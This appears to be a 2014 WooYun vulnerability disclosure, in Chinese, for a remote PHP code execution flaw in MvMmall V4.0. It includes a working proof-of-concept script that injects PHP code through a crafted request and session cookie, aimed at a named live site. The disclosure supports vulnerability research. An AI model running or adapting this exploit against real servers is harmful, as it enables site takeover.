当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-080042
漏洞标题:
MvMmall V4.0远程任意PHP代码执行
相关厂商:
MvMmall
漏洞作者:
Y.L.
提交时间:
2014-11-01 16:01
修复时间:
2014-12-16 16:02
公开时间:
2014-12-16 16:02
漏洞类型:
命令执行
危害等级:
自评Rank:
10
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-11-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

通过构造特殊的参数,可生成.php文件,并可写入php代码。

详细说明:

运行以下php代码

<?php
$host = 'www.verymall.cn';
$filename = '1.php';
$data  = "";
$data .= "GET /index.php?<?php phpinfo();?> HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "Cookie: sessionID={$filename};PHPSESSIN={$filename};\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$fp = fsockopen($host,80);
fwrite($fp,$data);
$ret = '';
while ( is_resource($fp) && !feof($fp) ) {
    $ret .= fread($fp,8192);
}
echo $ret;


即可生成以下文件
http://www.verymall.cn/union/data/session/mvm_sess_1.php

漏洞证明:

http://www.verymall.cn/union/data/session/mvm_sess_1.php

QQ截图20141019214921.png

修复方案:

版权声明:转载请注明来源 Y.L.@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝